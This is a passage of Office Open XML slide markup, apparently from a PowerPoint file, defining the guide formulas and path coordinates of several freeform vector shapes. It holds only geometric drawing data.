                  <a:gd name="T15" fmla="*/ 561 h 756"/>
                  <a:gd name="T16" fmla="*/ 0 w 715"/>
                  <a:gd name="T17" fmla="*/ 372 h 756"/>
                  <a:gd name="T18" fmla="*/ 89 w 715"/>
                  <a:gd name="T19" fmla="*/ 247 h 756"/>
                  <a:gd name="T20" fmla="*/ 451 w 715"/>
                  <a:gd name="T21" fmla="*/ 399 h 756"/>
                  <a:gd name="T22" fmla="*/ 451 w 715"/>
                  <a:gd name="T23" fmla="*/ 399 h 756"/>
                  <a:gd name="T24" fmla="*/ 178 w 715"/>
                  <a:gd name="T25" fmla="*/ 120 h 756"/>
                  <a:gd name="T26" fmla="*/ 257 w 715"/>
                  <a:gd name="T27" fmla="*/ 0 h 756"/>
                  <a:gd name="T28" fmla="*/ 608 w 715"/>
                  <a:gd name="T29" fmla="*/ 409 h 756"/>
                  <a:gd name="T30" fmla="*/ 608 w 715"/>
                  <a:gd name="T31" fmla="*/ 409 h 756"/>
                  <a:gd name="T32" fmla="*/ 651 w 715"/>
                  <a:gd name="T33" fmla="*/ 461 h 756"/>
                  <a:gd name="T34" fmla="*/ 682 w 715"/>
                  <a:gd name="T35" fmla="*/ 504 h 756"/>
                  <a:gd name="T36" fmla="*/ 682 w 715"/>
                  <a:gd name="T37" fmla="*/ 504 h 756"/>
                  <a:gd name="T38" fmla="*/ 703 w 715"/>
                  <a:gd name="T39" fmla="*/ 541 h 756"/>
                  <a:gd name="T40" fmla="*/ 714 w 715"/>
                  <a:gd name="T41" fmla="*/ 572 h 756"/>
                  <a:gd name="T42" fmla="*/ 714 w 715"/>
                  <a:gd name="T43" fmla="*/ 572 h 756"/>
                  <a:gd name="T44" fmla="*/ 714 w 715"/>
                  <a:gd name="T45" fmla="*/ 608 h 756"/>
                  <a:gd name="T46" fmla="*/ 708 w 715"/>
                  <a:gd name="T47" fmla="*/ 640 h 756"/>
                  <a:gd name="T48" fmla="*/ 708 w 715"/>
                  <a:gd name="T49" fmla="*/ 640 h 756"/>
                  <a:gd name="T50" fmla="*/ 693 w 715"/>
                  <a:gd name="T51" fmla="*/ 672 h 756"/>
                  <a:gd name="T52" fmla="*/ 667 w 715"/>
                  <a:gd name="T53" fmla="*/ 708 h 756"/>
                  <a:gd name="T54" fmla="*/ 635 w 715"/>
                  <a:gd name="T55" fmla="*/ 755 h 756"/>
                  <a:gd name="T56" fmla="*/ 546 w 715"/>
                  <a:gd name="T57" fmla="*/ 698 h 756"/>
                  <a:gd name="T58" fmla="*/ 546 w 715"/>
                  <a:gd name="T59" fmla="*/ 698 h 756"/>
                  <a:gd name="T60" fmla="*/ 572 w 715"/>
                  <a:gd name="T61" fmla="*/ 666 h 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15" h="756">
                    <a:moveTo>
                      <a:pt x="572" y="666"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="572" y="666"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="561"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="703" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="708"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="666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2" name="Freeform 23"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2913063" y="2084388"/>
                <a:ext cx="207962" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 331 w 579"/>
                  <a:gd name="T1" fmla="*/ 405 h 558"/>
                  <a:gd name="T2" fmla="*/ 389 w 579"/>
                  <a:gd name="T3" fmla="*/ 431 h 558"/>
                  <a:gd name="T4" fmla="*/ 404 w 579"/>
                  <a:gd name="T5" fmla="*/ 425 h 558"/>
                  <a:gd name="T6" fmla="*/ 441 w 579"/>
                  <a:gd name="T7" fmla="*/ 399 h 558"/>
                  <a:gd name="T8" fmla="*/ 457 w 579"/>
                  <a:gd name="T9" fmla="*/ 373 h 558"/>
                  <a:gd name="T10" fmla="*/ 463 w 579"/>
                  <a:gd name="T11" fmla="*/ 347 h 558"/>
                  <a:gd name="T12" fmla="*/ 452 w 579"/>
                  <a:gd name="T13" fmla="*/ 321 h 558"/>
                  <a:gd name="T14" fmla="*/ 436 w 579"/>
                  <a:gd name="T15" fmla="*/ 299 h 558"/>
                  <a:gd name="T16" fmla="*/ 394 w 579"/>
                  <a:gd name="T17" fmla="*/ 289 h 558"/>
                  <a:gd name="T18" fmla="*/ 374 w 579"/>
                  <a:gd name="T19" fmla="*/ 294 h 558"/>
                  <a:gd name="T20" fmla="*/ 263 w 579"/>
                  <a:gd name="T21" fmla="*/ 357 h 558"/>
                  <a:gd name="T22" fmla="*/ 237 w 579"/>
                  <a:gd name="T23" fmla="*/ 373 h 558"/>
                  <a:gd name="T24" fmla="*/ 184 w 579"/>
                  <a:gd name="T25" fmla="*/ 389 h 558"/>
                  <a:gd name="T26" fmla="*/ 158 w 579"/>
                  <a:gd name="T27" fmla="*/ 389 h 558"/>
                  <a:gd name="T28" fmla="*/ 110 w 579"/>
                  <a:gd name="T29" fmla="*/ 383 h 558"/>
                  <a:gd name="T30" fmla="*/ 63 w 579"/>
                  <a:gd name="T31" fmla="*/ 352 h 558"/>
                  <a:gd name="T32" fmla="*/ 43 w 579"/>
                  <a:gd name="T33" fmla="*/ 331 h 558"/>
                  <a:gd name="T34" fmla="*/ 21 w 579"/>
                  <a:gd name="T35" fmla="*/ 305 h 558"/>
                  <a:gd name="T36" fmla="*/ 0 w 579"/>
                  <a:gd name="T37" fmla="*/ 242 h 558"/>
                  <a:gd name="T38" fmla="*/ 6 w 579"/>
                  <a:gd name="T39" fmla="*/ 210 h 558"/>
                  <a:gd name="T40" fmla="*/ 11 w 579"/>
                  <a:gd name="T41" fmla="*/ 168 h 558"/>
                  <a:gd name="T42" fmla="*/ 63 w 579"/>
                  <a:gd name="T43" fmla="*/ 89 h 558"/>
                  <a:gd name="T44" fmla="*/ 90 w 579"/>
                  <a:gd name="T45" fmla="*/ 53 h 558"/>
                  <a:gd name="T46" fmla="*/ 153 w 579"/>
                  <a:gd name="T47" fmla="*/ 11 h 558"/>
                  <a:gd name="T48" fmla="*/ 184 w 579"/>
                  <a:gd name="T49" fmla="*/ 0 h 558"/>
                  <a:gd name="T50" fmla="*/ 247 w 579"/>
                  <a:gd name="T51" fmla="*/ 5 h 558"/>
                  <a:gd name="T52" fmla="*/ 305 w 579"/>
                  <a:gd name="T53" fmla="*/ 37 h 558"/>
                  <a:gd name="T54" fmla="*/ 242 w 579"/>
                  <a:gd name="T55" fmla="*/ 152 h 558"/>
                  <a:gd name="T56" fmla="*/ 210 w 579"/>
                  <a:gd name="T57" fmla="*/ 131 h 558"/>
                  <a:gd name="T58" fmla="*/ 184 w 579"/>
                  <a:gd name="T59" fmla="*/ 126 h 558"/>
                  <a:gd name="T60" fmla="*/ 158 w 579"/>
                  <a:gd name="T61" fmla="*/ 131 h 558"/>
                  <a:gd name="T62" fmla="*/ 137 w 579"/>
                  <a:gd name="T63" fmla="*/ 147 h 558"/>
                  <a:gd name="T64" fmla="*/ 121 w 579"/>
                  <a:gd name="T65" fmla="*/ 195 h 558"/>
                  <a:gd name="T66" fmla="*/ 121 w 579"/>
                  <a:gd name="T67" fmla="*/ 210 h 558"/>
                  <a:gd name="T68" fmla="*/ 142 w 579"/>
                  <a:gd name="T69" fmla="*/ 242 h 558"/>
                  <a:gd name="T70" fmla="*/ 158 w 579"/>
                  <a:gd name="T71" fmla="*/ 252 h 558"/>
                  <a:gd name="T72" fmla="*/ 179 w 579"/>
                  <a:gd name="T73" fmla="*/ 252 h 558"/>
                  <a:gd name="T74" fmla="*/ 231 w 579"/>
                  <a:gd name="T75" fmla="*/ 231 h 558"/>
                  <a:gd name="T76" fmla="*/ 310 w 579"/>
                  <a:gd name="T77" fmla="*/ 184 h 558"/>
                  <a:gd name="T78" fmla="*/ 363 w 579"/>
                  <a:gd name="T79" fmla="*/ 152 h 558"/>
                  <a:gd name="T80" fmla="*/ 415 w 579"/>
                  <a:gd name="T81" fmla="*/ 147 h 558"/>
                  <a:gd name="T82" fmla="*/ 436 w 579"/>
                  <a:gd name="T83" fmla="*/ 147 h 558"/>
                  <a:gd name="T84" fmla="*/ 489 w 579"/>
                  <a:gd name="T85" fmla="*/ 168 h 558"/>
                  <a:gd name="T86" fmla="*/ 510 w 579"/>
                  <a:gd name="T87" fmla="*/ 184 h 558"/>
                  <a:gd name="T88" fmla="*/ 562 w 579"/>
                  <a:gd name="T89" fmla="*/ 247 h 558"/>
                  <a:gd name="T90" fmla="*/ 573 w 579"/>
                  <a:gd name="T91" fmla="*/ 278 h 558"/>
                  <a:gd name="T92" fmla="*/ 578 w 579"/>
                  <a:gd name="T93" fmla="*/ 315 h 558"/>
                  <a:gd name="T94" fmla="*/ 562 w 579"/>
                  <a:gd name="T95" fmla="*/ 383 h 558"/>
                  <a:gd name="T96" fmla="*/ 541 w 579"/>
                  <a:gd name="T97" fmla="*/ 420 h 558"/>
                  <a:gd name="T98" fmla="*/ 515 w 579"/>
                  <a:gd name="T99" fmla="*/ 457 h 558"/>
                  <a:gd name="T100" fmla="*/ 447 w 579"/>
                  <a:gd name="T101" fmla="*/ 525 h 558"/>
                  <a:gd name="T102" fmla="*/ 410 w 579"/>
                  <a:gd name="T103" fmla="*/ 546 h 558"/>
                  <a:gd name="T104" fmla="*/ 378 w 579"/>
                  <a:gd name="T105" fmla="*/ 557 h 558"/>
                  <a:gd name="T106" fmla="*/ 316 w 579"/>
                  <a:gd name="T107" fmla="*/ 546 h 558"/>
                  <a:gd name="T108" fmla="*/ 284 w 579"/>
                  <a:gd name="T109" fmla="*/ 530 h 558"/>
                  <a:gd name="T110" fmla="*/ 237 w 579"/>
                  <a:gd name="T111" fmla="*/ 494 h 558"/>
                  <a:gd name="T112" fmla="*/ 331 w 579"/>
                  <a:gd name="T113" fmla="*/ 405 h 5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79" h="558">
                    <a:moveTo>
                      <a:pt x="331" y="405"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="331" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="463" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="525"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="557"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="405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3" name="Freeform 24"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2955925" y="1952625"/>
                <a:ext cx="236538" cy="217488"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 95 w 658"/>
                  <a:gd name="T1" fmla="*/ 0 h 604"/>
                  <a:gd name="T2" fmla="*/ 189 w 658"/>
                  <a:gd name="T3" fmla="*/ 78 h 604"/>
                  <a:gd name="T4" fmla="*/ 89 w 658"/>
                  <a:gd name="T5" fmla="*/ 189 h 604"/>
                  <a:gd name="T6" fmla="*/ 0 w 658"/>
                  <a:gd name="T7" fmla="*/ 105 h 604"/>
                  <a:gd name="T8" fmla="*/ 95 w 658"/>
                  <a:gd name="T9" fmla="*/ 0 h 604"/>
                  <a:gd name="T10" fmla="*/ 236 w 658"/>
                  <a:gd name="T11" fmla="*/ 126 h 604"/>
                  <a:gd name="T12" fmla="*/ 657 w 658"/>
                  <a:gd name="T13" fmla="*/ 493 h 604"/>
                  <a:gd name="T14" fmla="*/ 562 w 658"/>
                  <a:gd name="T15" fmla="*/ 603 h 604"/>
                  <a:gd name="T16" fmla="*/ 142 w 658"/>
                  <a:gd name="T17" fmla="*/ 231 h 604"/>
                  <a:gd name="T18" fmla="*/ 236 w 658"/>
                  <a:gd name="T19" fmla="*/ 126 h 6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58" h="604">
                    <a:moveTo>
                      <a:pt x="95" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="236" y="126"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="657" y="493"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="126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4" name="Freeform 25"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3094038" y="1884363"/>
                <a:ext cx="198437" cy="200025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 237 w 553"/>
                  <a:gd name="T1" fmla="*/ 142 h 557"/>
                  <a:gd name="T2" fmla="*/ 205 w 553"/>
                  <a:gd name="T3" fmla="*/ 126 h 557"/>
                  <a:gd name="T4" fmla="*/ 174 w 553"/>
                  <a:gd name="T5" fmla="*/ 120 h 557"/>
                  <a:gd name="T6" fmla="*/ 158 w 553"/>
                  <a:gd name="T7" fmla="*/ 126 h 557"/>
                  <a:gd name="T8" fmla="*/ 142 w 553"/>
                  <a:gd name="T9" fmla="*/ 136 h 557"/>
                  <a:gd name="T10" fmla="*/ 121 w 553"/>
                  <a:gd name="T11" fmla="*/ 178 h 557"/>
                  <a:gd name="T12" fmla="*/ 121 w 553"/>
                  <a:gd name="T13" fmla="*/ 199 h 557"/>
                  <a:gd name="T14" fmla="*/ 132 w 553"/>
                  <a:gd name="T15" fmla="*/ 220 h 557"/>
                  <a:gd name="T16" fmla="*/ 164 w 553"/>
                  <a:gd name="T17" fmla="*/ 267 h 557"/>
                  <a:gd name="T18" fmla="*/ 221 w 553"/>
                  <a:gd name="T19" fmla="*/ 330 h 557"/>
                  <a:gd name="T20" fmla="*/ 289 w 553"/>
                  <a:gd name="T21" fmla="*/ 388 h 557"/>
                  <a:gd name="T22" fmla="*/ 315 w 553"/>
                  <a:gd name="T23" fmla="*/ 409 h 557"/>
                  <a:gd name="T24" fmla="*/ 342 w 553"/>
                  <a:gd name="T25" fmla="*/ 425 h 557"/>
                  <a:gd name="T26" fmla="*/ 384 w 553"/>
                  <a:gd name="T27" fmla="*/ 430 h 557"/>
                  <a:gd name="T28" fmla="*/ 400 w 553"/>
                  <a:gd name="T29" fmla="*/ 425 h 557"/>
                  <a:gd name="T30" fmla="*/ 415 w 553"/>
                  <a:gd name="T31" fmla="*/ 414 h 557"/>
                  <a:gd name="T32" fmla="*/ 431 w 553"/>
                  <a:gd name="T33" fmla="*/ 383 h 557"/>
                  <a:gd name="T34" fmla="*/ 431 w 553"/>
                  <a:gd name="T35" fmla="*/ 351 h 557"/>
                  <a:gd name="T36" fmla="*/ 426 w 553"/>
                  <a:gd name="T37" fmla="*/ 336 h 557"/>
                  <a:gd name="T38" fmla="*/ 373 w 553"/>
                  <a:gd name="T39" fmla="*/ 273 h 557"/>
                  <a:gd name="T40" fmla="*/ 468 w 553"/>
                  <a:gd name="T41" fmla="*/ 173 h 557"/>
                  <a:gd name="T42" fmla="*/ 531 w 553"/>
                  <a:gd name="T43" fmla="*/ 252 h 557"/>
                  <a:gd name="T44" fmla="*/ 552 w 553"/>
                  <a:gd name="T45" fmla="*/ 325 h 557"/>
                  <a:gd name="T46" fmla="*/ 552 w 553"/>
                  <a:gd name="T47" fmla="*/ 362 h 557"/>
                  <a:gd name="T48" fmla="*/ 515 w 553"/>
                  <a:gd name="T49" fmla="*/ 441 h 557"/>
                  <a:gd name="T50" fmla="*/ 478 w 553"/>
                  <a:gd name="T51" fmla="*/ 483 h 557"/>
                  <a:gd name="T52" fmla="*/ 405 w 553"/>
                  <a:gd name="T53" fmla="*/ 541 h 557"/>
                  <a:gd name="T54" fmla="*/ 368 w 553"/>
                  <a:gd name="T55" fmla="*/ 556 h 557"/>
                  <a:gd name="T56" fmla="*/ 326 w 553"/>
                  <a:gd name="T57" fmla="*/ 556 h 557"/>
                  <a:gd name="T58" fmla="*/ 231 w 553"/>
                  <a:gd name="T59" fmla="*/ 520 h 557"/>
                  <a:gd name="T60" fmla="*/ 179 w 553"/>
                  <a:gd name="T61" fmla="*/ 483 h 557"/>
                  <a:gd name="T62" fmla="*/ 121 w 553"/>
                  <a:gd name="T63" fmla="*/ 430 h 557"/>
                  <a:gd name="T64" fmla="*/ 32 w 553"/>
                  <a:gd name="T65" fmla="*/ 320 h 557"/>
                  <a:gd name="T66" fmla="*/ 11 w 553"/>
                  <a:gd name="T67" fmla="*/ 273 h 557"/>
                  <a:gd name="T68" fmla="*/ 0 w 553"/>
                  <a:gd name="T69" fmla="*/ 226 h 557"/>
                  <a:gd name="T70" fmla="*/ 17 w 553"/>
                  <a:gd name="T71" fmla="*/ 142 h 557"/>
                  <a:gd name="T72" fmla="*/ 37 w 553"/>
                  <a:gd name="T73" fmla="*/ 100 h 557"/>
                  <a:gd name="T74" fmla="*/ 69 w 553"/>
                  <a:gd name="T75" fmla="*/ 63 h 557"/>
                  <a:gd name="T76" fmla="*/ 142 w 553"/>
                  <a:gd name="T77" fmla="*/ 10 h 557"/>
                  <a:gd name="T78" fmla="*/ 216 w 553"/>
                  <a:gd name="T79" fmla="*/ 0 h 557"/>
                  <a:gd name="T80" fmla="*/ 258 w 553"/>
                  <a:gd name="T81" fmla="*/ 5 h 557"/>
                  <a:gd name="T82" fmla="*/ 331 w 553"/>
                  <a:gd name="T83" fmla="*/ 42 h 557"/>
                  <a:gd name="T84" fmla="*/ 268 w 553"/>
                  <a:gd name="T85" fmla="*/ 173 h 557"/>
                  <a:gd name="T86" fmla="*/ 237 w 553"/>
                  <a:gd name="T87" fmla="*/ 142 h 5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553" h="557">
                    <a:moveTo>
                      <a:pt x="237" y="142"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="237" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="157"/>
